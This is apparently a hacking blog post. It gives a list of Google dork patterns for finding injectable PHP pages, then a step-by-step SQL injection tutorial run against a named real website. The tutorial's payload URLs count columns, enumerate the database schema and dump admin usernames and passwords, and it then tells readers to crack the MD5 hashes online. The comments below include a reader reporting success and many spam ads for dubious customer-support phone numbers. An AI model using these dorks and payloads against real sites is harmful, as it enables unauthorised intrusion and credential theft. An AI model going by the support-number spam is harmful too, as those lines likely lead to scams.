inurl:trainers.php?id=
inurl:buy.php?category=
inurl:article.php?ID=
inurl:play_old.php?id=
inurl:declaration_more.php?decl_id=
inurl:pageid=
inurl:games.php?id=
inurl:page.php?file=
inurl:newsDetail.php?id=
inurl:gallery.php?id=
inurl:article.php?id=
inurl:show.php?id=
inurl:staff_id=
inurl:newsitem.php?num=
inurl:readnews.php?id=
inurl:top10.php?cat=
inurl:historialeer.php?num=
inurl:reagir.php?num=
inurl:Stray-Questions-View.php?num=
inurl:forum_bds.php?num=
inurl:game.php?id=
inurl:view_product.php?id=
inurl:newsone.php?id=
inurl:sw_comment.php?id=
inurl:news.php?id=
inurl:avd_start.php?avd=
inurl:event.php?id=
inurl:product-item.php?id=
inurl:sql.php?id=
inurl:news_view.php?id=
inurl:select_biblio.php?id=
inurl:humor.php?id=
inurl:aboutbook.php?id=
inurl:ogl_inet.php?ogl_id=
inurl:fiche_spectacle.php?id=
inurl:communique_detail.php?id=
inurl:sem.php3?id=
inurl:kategorie.php4?id=
inurl:news.php?id=
inurl:index.php?id=
inurl:faq2.php?id=
inurl:show_an.php?id=
inurl:preview.php?id=
inurl:loadpsb.php?id=
inurl:opinions.php?id=
inurl:spr.php?id=
inurl:pages.php?id=
inurl:announce.php?id=
inurl:clanek.php4?id=
inurl:participant.php?id=
inurl:download.php?id=
inurl:main.php?id=
inurl:review.php?id=
inurl:chappies.php?id=
inurl:read.php?id=
inurl:prod_detail.php?id=
inurl:viewphoto.php?id=
inurl:article.php?id=
inurl:person.php?id=
inurl:productinfo.php?id=
inurl:showimg.php?id=
inurl:view.php?id=
inurl:website.php?id=
inurl:hosting_info.php?id=
inurl:gallery.php?id=
inurl:rub.php?idr=
inurl:view_faq.php?id=
inurl:artikelinfo.php?id=
inurl:detail.php?ID=
inurl:index.php?=
inurl:profile_view.php?id=
inurl:category.php?id=
inurl:publications.php?id=
inurl:fellows.php?id=
inurl:downloads_info.php?id=
inurl:prod_info.php?id=
inurl:shop.php?do=part&id=
inurl:productinfo.php?id=
inurl:collectionitem.php?id=
inurl:band_info.php?id=
inurl:product.php?id=
inurl:releases.php?id=
inurl:ray.php?id=
inurl:produit.php?id=
inurl:pop.php?id=
inurl:shopping.php?id=
inurl:productdetail.php?id=
inurl:post.php?id=
inurl:viewshowdetail.php?id=
inurl:clubpage.php?id=
inurl:memberInfo.php?id=
inurl:section.php?id=
inurl:theme.php?id=
inurl:page.php?id=
inurl:shredder-categories.php?id=
inurl:tradeCategory.php?id=
inurl:product_ranges_view.php?ID=
inurl:shop_category.php?id=
inurl:transcript.php?id=
inurl:channel_id=
inurl:item_id=
inurl:newsid=
inurl:trainers.php?id=
inurl:news-full.php?id=
inurl:news_display.php?getid=
inurl:index2.php?option=
inurl:readnews.php?id=
inurl:top10.php?cat=
inurl:newsone.php?id=
inurl:event.php?id=
inurl:product-item.php?id=
inurl:sql.php?id=
inurl:aboutbook.php?id=
inurl:preview.php?id=
inurl:loadpsb.php?id=
inurl:pages.php?id=
inurl:material.php?id=
inurl:clanek.php4?id=
inurl:announce.php?id=
inurl:chappies.php?id=
inurl:read.php?id=
inurl:viewapp.php?id=
inurl:viewphoto.php?id=
inurl:rub.php?idr=
inurl:galeri_info.php?l=
inurl:review.php?id=
inurl:iniziativa.php?in=
inurl:curriculum.php?id=
inurl:labels.php?id=
inurl:story.php?id=
inurl:look.php?ID=
inurl:newsone.php?id=
inurl:aboutbook.php?id=
inurl:material.php?id=
inurl:opinions.php?id=
inurl:announce.php?id=
inurl:rub.php?idr=
inurl:galeri_info.php?l=
inurl:tekst.php?idt=
inurl:newscat.php?id=
inurl:newsticker_info.php?idn=
inurl:rubrika.php?idr=
inurl:rubp.php?idr=
inurl:offer.php?idf=
inurl:art.php?idm=
inurl:title.php?id=
buy.php?category=
article.php?ID=
play_old.php?id=
declaration_more.php?decl_id=
Pageid=
games.php?id=
page.php?file=
newsDetail.php?id=
gallery.php?id=
article.php?id=
play_old.php?id=
show.php?id=
staff_id=
newsitem.php?num=
readnews.php?id=
top10.php?cat=
historialeer.php?num=
reagir.php?num=
forum_bds.php?num=
game.php?id=
view_product.php?id=
newsone.php?id=
sw_comment.php?id=
news.php?id=
avd_start.php?avd=
event.php?id=
product-item.php?id=
sql.php?id=
news_view.php?id=
select_biblio.php?id=
humor.php?id=
aboutbook.php?id=
fiche_spectacle.php?id=
communique_detail.php?id=
sem.php3?id=
kategorie.php4?id=
faq2.php?id=
show_an.php?id=
preview.php?id=
loadpsb.php?id=
opinions.php?id=
spr.php?id=
pages.php?id=
announce.php?id=
clanek.php4?id=
participant.php?id=
download.php?id=
main.php?id=
review.php?id=
chappies.php?id=
read.php?id=
prod_detail.php?id=
viewphoto.php?id=
article.php?id=
play_old.php?id=
declaration_more.php?decl_id=
category.php?id=
publications.php?id=
fellows.php?id=
downloads_info.php?id=
prod_info.php?id=
shop.php?do=part&id=
Productinfo.php?id=
website.php?id=
Productinfo.php?id=
showimg.php?id=
view.php?id=
rub.php?idr=
view_faq.php?id=
artikelinfo.php?id=
detail.php?ID=
collectionitem.php?id=
band_info.php?id=
product.php?id=
releases.php?id=
ray.php?id=
produit.php?id=
pop.php?id=
shopping.php?id=
productdetail.php?id=
post.php?id=
viewshowdetail.php?id=
clubpage.php?id=
memberInfo.php?id=
section.php?id=
theme.php?id=
page.php?id=
shredder-categories.php?id=
tradeCategory.php?id=
shop_category.php?id=
transcript.php?id=
channel_id=
item_id=
newsid=
trainers.php?id=
buy.php?category=
article.php?ID=
play_old.php?id=
iniziativa.php?in=
detail_new.php?id=
tekst.php?idt=
newscat.php?id=
newsticker_info.php?idn=
rubrika.php?idr=
rubp.php?idr=
offer.php?idf=
hotel.php?id=
art.php?idm=
title.php?id=
look.php?ID=
story.php?id=
labels.php?id=
review.php?id=
chappies.php?id=
news-full.php?id=
news_display.php?getid=
index2.php?option=
ages.php?id=
"id=" & intext:"Warning: mysql_fetch_assoc()
"id=" & intext:"Warning: mysql_fetch_array()
"id=" & intext:"Warning: mysql_num_rows()
"id=" & intext:"Warning: session_start()
"id=" & intext:"Warning: getimagesize()
"id=" & intext:"Warning: Unknown()
"id=" & intext:"Warning: pg_exec()
"id=" & intext:"Warning: array_merge()
"id=" & intext:"Warning: mysql_result()
"id=" & intext:"Warning: mysql_num_rows()
"id=" & intext:"Warning: mysql_query()
"id=" & intext:"Warning: filesize()
"id=" & intext:"Warning: require()Now to check manually a site if it is vulnerable, just add ' at the end of the url:
For example, we have our target,
Code:
http://www.cocobod.gh/news_details.php?id=30Now, we want to check if this is SQLi vulnerable, so we add ' at the end:
Code:
http://www.cocobod.gh/news_details.php?id=30'If we got an error, that means that the site is vulnerable!
![[Image: 1301868109-1.JPG]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_uvK6Z-FxdhsHTmVu3gFrh5xChcy0WOuFWIEKtmoB4gfzcVepFULkR9hnqiG9hecO8MdFPQCE5ACLSgj3HmkY9DDptwZtRvTijfzpfvZ7ldWbGIbw=s0-d)
So, now we move on to the next step.
How To Find Columns Count:
After you have your vulnerable site, you need to know his columns count, to do this, just add "order by X--" at the end of the URL,
X is a number from 1 to unlimited.
For example, we have our target server and we try to count columns,
we add order by 1-- at the end , then order by 2--,ect. Always increase number until u got an error in your
So, in our target server, we have tried this:
Code:
http://www.cocobod.gh/news_details.php?id=30 order by 1-- >> no error
http://www.cocobod.gh/news_details.php?id=30 order by 2-- >> no error
http://www.cocobod.gh/news_details.php?id=30 order by 3-- >> no error
http://www.cocobod.gh/news_details.php?id=30 order by 4-- >> no error
http://www.cocobod.gh/news_details.php?id=30 order by 5-- >> no error
http://www.cocobod.gh/news_details.php?id=30 order by 6-- >> no error
http://www.cocobod.gh/news_details.php?id=30 order by 7-- >> no error
http://www.cocobod.gh/news_details.php?id=30 order by 8-- >> Unknown columnhttp://www.cocobod.gh/news_details.php?id=30 order by 8-- >> Unknown column
That means that the 8th column does not exist, that means that column count is 7!
How to Find The Accessible Columns:
Now, we now that column count which is 7, next step is to check for acsessable columns, to do that, we use this querie "UNION SELECT number,of,columns--" like this:
Code:
http://www.cocobod.gh/news_details.php?id=30 union select 1,2,3,4,5,6,7--You will get something like this:
![[Image: 1301868535-3.JPG]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_vVixJPNJXM0nT8F_kMx7i5Zkf6OwYzp93DKBill6G5kk3UNzN_orOpsB7kwgPe7ttWaurg-AYol6ersDwk0KX3NX_mZ_Ms4_2VKitKAVd9ABI2dg=s0-d)
That means that we can get information from the site from the 6th, the 2nd and the 3rd column!
How To Get MySQL DB Version:
We need to know MySQL DB Version to know if we can exploit this site or not, cause every site that is using MySQL 4.x.x you wont be able to work on it, but every 5.x.x or above is exploitable.
So to know MySQL DB Vesrion, just replace the number of the used column with "@@version"
For example:
Code:
http://www.cocobod.gh/news_details.php?id=30 union select 1,2,3,4,5,@@version,7--![[Image: 1301869123-4.JPG]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_uos-u15ndU5CyEY2-632bhgpAckiRHoHXtJOElavUgDjOuHR-VugEKQ0V9xKlymvQ3rcQsCJyc8CbUFv8NWg0Lc75pJ2RddkHPUn4tOGCxx9xEiUI=s0-d)
That means that we can continue working on this site.
How To Find Database Name:
Now , we are going to inject the site to find the DB Name,
to do this, replace the used column number with "group_concat(schema_name)", and add "from information_schema.schemata--" after the last column number, for example:
Code:
http://www.cocobod.gh/news_details.php?id=30
union select 1,2,3,4,5,group_concat(schema_name),7 from
information_schema.schemata--![[Image: 1301869671-5.JPG]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_vW_UJlwVIqZDQR_jcLqaOZ9dX36CGVTfmSV5fW4fEXwQjCDtvyD4SS7GrbtRlrUnN05oMIWX0WT0Awm62Qwve8mwfyLPaqPvuiOAuqFtPLs96HzWg=s0-d)
Now, to use the one the website uses, replace "group_concat(schema_name)" with "concat(database())" for example:
Code:
http://www.cocobod.gh/news_details.php?id=30 union select 1,2,3,4,5,concat(database()),7 from information_schema.schemata--![[Image: 1301869885-6.JPG]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_tuZx28ISHeEifEgX4_Zoa-F6iyWkhMmsLVRSUGPjPgJ5hfEp6cuJ70q7XfZOZQF-fMaY0xuoLNV9bvQaT6J6lTfFIjjdOYVdhWzq9jiCHVpIUj-5M=s0-d)
Congrats, you got the used DB!
How to Get The Table Names:
Now we need to get table names, to do this, replace the used column number with "group_concat(table_name)" and add "from information_schema.tables where table_schema=database()--" at the end of columns number.
Code:
http://www.cocobod.gh/news_details.php?id=30
union select 1,2,3,4,5,group_concat(table_name),7 from
information_schema.tables where table_schema=database()--![[Image: 1301870439-7.JPG]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_vHF_5G4ZwPNkT5Z6a7De8ktaushWTw_tlh6w7wCamXwGx6Ik15rUfoptl2uh1n6DXd6Aaj46fOHTP_IBdkYUcM02cOKcDV1Kvc_pgG2eq_ysAgUg=s0-d)
How To Get Column Names:
To get column names, we will use this querie:
group_concat(column_name)
from information_schema.columns where table_schema=database()--
Example:
Code:
http://www.cocobod.gh/news_details.php?id=30
union select 1,2,3,4,5,group_concat(column_name),7 from
information_schema.columns where table_schema=database()--![[Image: 1301870776-8.JPG]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_s2aCUjrebOi0tze4vMNRhp6z-B6na0DFpm4LN902yV1haULvdWbGwqrcAfQVjwhUwGP7TWZevdCciBqZyfjMiZ0A5ysrFaK6nWLyaAwhlftccQtO8=s0-d)
How To Get Informations From Columns:
Now, we are in our final step, now we will get the admin info from column, how to do it?
Simple, follow this example:
Code:
http://www.site.com/news_details.php?id=30
union select
1,2,3,4,5,group_concat(columusername,0x3a,columnpassword),7 from
currentdb.tableused--So our exploit will be like this:
Code:
http://www.cocobod.gh/news_details.php?id=30
union select 1,2,3,4,5,group_concat(username,0x3a,password),7 from
cocobod_gh.coc_admin--![[Image: 1301871581-9.JPG]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_tvtaOvGN9J_jXPQSkkw7rscCRsZgne8yyDUzYhfPC9GdAydQuwcCfCuIlqlGwBnB784uhPhBoJL0co3Hkr1wbqd41oqop7W4LMD4Q2sSZy702nRx8=s0-d)
Now we need to decrypt the password that is crypted in md5,
go to http://www.md5decrypter.co.uk/ paste your hash, fill the captcha and click on decrypt, with a little luck, you will get the pass like here:
![[Image: 1301871757-10.JPG]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_t31g4qUcKCXw3AGippY44D9niT9FONeLXcIP6_e9RdWjUCbRkdIyg2uNFAB7zehpHiQ9KQH9BMmBfV8s09XV5PCQvsPSUrmORZw_V1Uk4aFNnyZ5Y3=s0-d)
We have succelfully injected a website, and got the admin info! Thank you for reading my TuT!
Thanks so much, I'm stuck on the last step, everything worked perfectly, but I'm not getting any results (No SQL errors either) D:
ReplyDeleteHow much creativity you have shown by your post. You really a genius. I love you work. Thanks for sharing.
ReplyDeleteWe are providing online image editing system > Clipping Path
mantap gan tutorialnya udah ane praktekan sukses..
ReplyDeleteTokoCOD
This is very interesting, You're a very skilled blogger. I have joined your rss feed and look forward to seeking more of your excellent post. Also, I have shared your website in my social networks!
ReplyDelete0day tech
Today Microsoft Office has become the essential element for personal as well as professional use. It is playing an important in Office administration. Its user-friendly interface, productive and analytical tools and easy & collaborated communication method is easing the work-culture in an office as well as home and school. If you also want to bolster your performance by getting Microsoft Office,
ReplyDeleteoffice.com/setup
Canon provides customer support for everyone who is in a dire need for a printer fix.Follow the links to know more:
ReplyDeleteBrother printer support | Canon Printer Support | Epson printer support | Canon Printer Support | Hp printer support
Yahoo mail no t working
ReplyDeleteHow to Sync yahoo mail with mac mail
Outlook Helpline Number
Nice Post
ReplyDeleteHP Printer Support
HP Printer Support Number
HP Printer Support
All the representatives of HP Printer support center are certified by the reputed organization, and they all have many years of expertise in this field.
ReplyDeleteUnable To Make Verification Of My Phone At The Time Of Using The Mobile App
ReplyDeleteBinance exchange has its own mobile application for its users and sometimes they get in trouble during phone verification via using the mobile application. Call 1833-464-7652 If you want to eliminate this error, and rooting for solutions at search engines, you should don’t waste your time and directly get in touch with the skilled professionals who are there to guide you. You can always call on Binance support number which is always functional and the team is ready to guide you at every step to wipe out all your troubles in nick of time.
Issues Due To Binance 2FA Failed
ReplyDeleteDoes this happen with you that all of a sudden you get into Binance two-factor authentication error in your Binance exchange? If you are unable to deal with Binance two-factor authentication problem and looking for solutions, you can always have conversation with the team members who are there to guide you. Whenever you are in such situation, reaching them would be the right decision as the team is always ready to help you, you can always call on Binance helpline number which is always functional and the team is ready to support you.
Unable To Verify An Email Address In Ledger Nano S.
ReplyDeleteIs your email address not verified yet in the Ledger Nano S. account? Do you know the steps and processes to verify the email address in your Ledger Nano S. account? Is this error consuming your time and you are looking for instant solutions? If you can’t deal with this error and you need remedies, feel free to get in contact with the team members who are always there to guide you. Whenever you are in worry, call them on Ledger Nano S. customer care number which is always active and all your doubts will be cleared under their guidance. For more details call us on 1-877-846-2817.
Is problem occurring due to disability to withdraw funds in your Cash App account? How to handle withdraw funds errors that create improper functioning in your Cash App account? If you have no solutions to deal with Cash App errors, you can immediately call on Cash App helpdesk number and get required solutions in no time and get immediate freedom from the errors that are bothering you. The team is always at your support so that you can concentrate on your work. The team is always helpful and deal with your queries with you so that you don’t face any trouble while executing the process.
ReplyDeleteCash App Customer Number
Is problem occurring due to disability to withdraw funds in your Cash App account? How to handle withdraw funds errors that create improper functioning in your Cash App account? If you have no solutions to deal with Cash App errors, you can immediately call on Cash App helpdesk number and get required solutions in no time and get immediate freedom from the errors that are bothering you. The team is always at your support so that you can concentrate on your work. The team is always helpful and deal with your queries with you so that you don’t face any trouble while executing the process.
ReplyDeleteCash App Customer Number
Being the largest exchange in the world, Binance exchange has earned name since its inception worldwide. Do you want to get rid of transaction errors in Binance as you are unable to check out your transaction? Such errors are quite daunting and should be fixed on urgent basis as sometimes neglect results into big loss. To get idea about the error as well as to get solutions, you can dial Binance support number which is always functional and you can always speak to the professionals to get rid of the errors. Call on this number anytime to get out-of-the-box solutions in no time. Reach and speak to the team for better remedies. Binance Phone Number
ReplyDeleteGood database.
ReplyDeleteJewelry Photography